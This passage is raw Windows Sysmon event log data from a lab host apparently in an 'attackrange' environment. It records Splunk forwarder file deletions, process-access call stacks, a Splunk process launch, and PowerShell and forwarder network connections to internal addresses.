Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4FDE5435C7C4A988A3C4C9A8F5B7B88,SHA256=1FC25BE3D0E86F05764A2912B906453AA443CAD16CFC46ADF8213B4AA6461574,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498636Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:55.577{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F88AF666222CEED2684ED3ABAD97A62B,SHA256=EB8A4D2C4188CC6C50508301B6DC92ED047D253C703FED7D126255AEB6AA817C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498638Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:56.859{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFA5318F6140BFCC482754A2FA3FB69E,SHA256=7B58E6F8EE4D2A78A21E1AC4527617EB5A969F0A5E396A8B3BA9E142078BC369,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498641Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:57.892{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E05898F2CCA632391EFA950FC9522632,SHA256=15E321B3CDA17FE2625472C5AFB1BC87D7886BFBB00907E84B7418896FF7AADA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498640Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:57.659{B81B27B7-4012-611D-0D00-00000000C801}7925132C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000036498639Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:26.153{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50669-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498643Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:58.910{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACDEB2DF85FDD4AC2593243F9F94589B,SHA256=B88491D22A472A166238A40ED5A340AF4CA790CDDF30A6F5445F48637CA4658D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498642Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:27.851{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50670-false10.0.1.12-8000- 23542300x800000000000000036498645Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:59.924{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5933A7B1B598E2FD9D9D05F45324EA6,SHA256=2D05651B206B282BE7EBE28BDFA77DFC6AD1E519B4369D667616B94E1D3C32CC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498644Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:59.691{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=6D4D39704A141349553992F8FB216341,SHA256=81E313B4B582B17BDF308D7FA1B82694988C815FACBE50A626B4F7FAF1472A43,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498647Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:00.970{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8750BB77A305B833F5005D0514821CA,SHA256=74532B42C29471819B2CF080601233AFCE9A2E74F5D88E297036CDC4504E90F8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498646Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:30.164{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50671-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498648Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:01.987{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=529D6483B21E47EC3E30EC6130B21002,SHA256=62987FCDD7A6FE0AE38CBF7263C4FC7C8B00EA139D4097CF2C1863FFD17BF63B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498651Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:03.521{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E3EB68F8B345F029ABB99DD883284CFE,SHA256=DA26C3AE5476644207DA7D3C42830F9855139307F916C48266059B158C613300,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498650Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:32.860{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50672-false10.0.1.12-8000- 23542300x800000000000000036498649Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:03.007{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F10F32BF5D40FFA101AA5C29CD05C6AE,SHA256=0547FAC84E943BCC130CFBB5E7BD8AD40ADF33A58B802E63C1304DCD4A79780A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498653Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:34.176{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50673-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498652Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:04.051{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14A85F6C678F99B84609F6B2E63F2B9D,SHA256=97F7B25DBF001EE89690D8E8DEB609BAAC202EA7B5B694C39F6BD4409D126720,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498654Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:05.067{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58735FBE8C4C69F05EF47DDD9B4118C6,SHA256=0E70D3479A56DD3E3F637803852E60F6705AF8C49570D47D555B4B8CCB0283F1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498655Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:06.082{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B18D0FC89FD550225147BC4B3773794,SHA256=07395204C7B8E14FA1FDBB34AE1B52A53087DD1956BF6F0FDE50B366E82E2A86,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498665Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:07.985{B81B27B7-A23B-6140-B356-04000000C801}1932332C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498664Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:07.832{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A23B-6140-B356-04000000C801}1932C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498663Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:07.832{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498662Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:07.832{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498661Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:07.832{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498660Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:07.832{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498659Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:07.832{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-A23B-6140-B356-04000000C801}1932C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498658Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:07.832{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A23B-6140-B356-04000000C801}1932C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498657Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:07.817{B81B27B7-A23B-6140-B356-04000000C801}1932C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036498656Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:07.117{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=947DE096D9A88AFAB5C82F6BA4FDEF87,SHA256=CBF4BEDF18ECD4000D5A2198FE7382E6721046A051E71F83CDCC771C98DD4CEF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498677Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:08.846{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4CD1B6D58666F2F50C0111432A65EBBE,SHA256=0DDFAC7884564DC3DD86FE4ABFE2970C3BB3DD53BD3FF87B066ADEC12BC14639,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498676Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:08.846{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7F424B52D36873874D5194FF345226EF,SHA256=5687DECC030B76A9D07FF9E98C8D760B3810E82FCDFD51C0EE1BEF29313F228F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498675Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:37.909{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50674-false10.0.1.12-8000- 10341000x800000000000000036498674Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:08.531{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A23C-6140-B456-04000000C801}6240C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498673Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:08.531{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498672Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:08.531{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498671Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:08.531{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498670Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:08.531{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498669Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:08.531{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A23C-6140-B456-04000000C801}6240C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498668Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:08.531{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A23C-6140-B456-04000000C801}6240C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 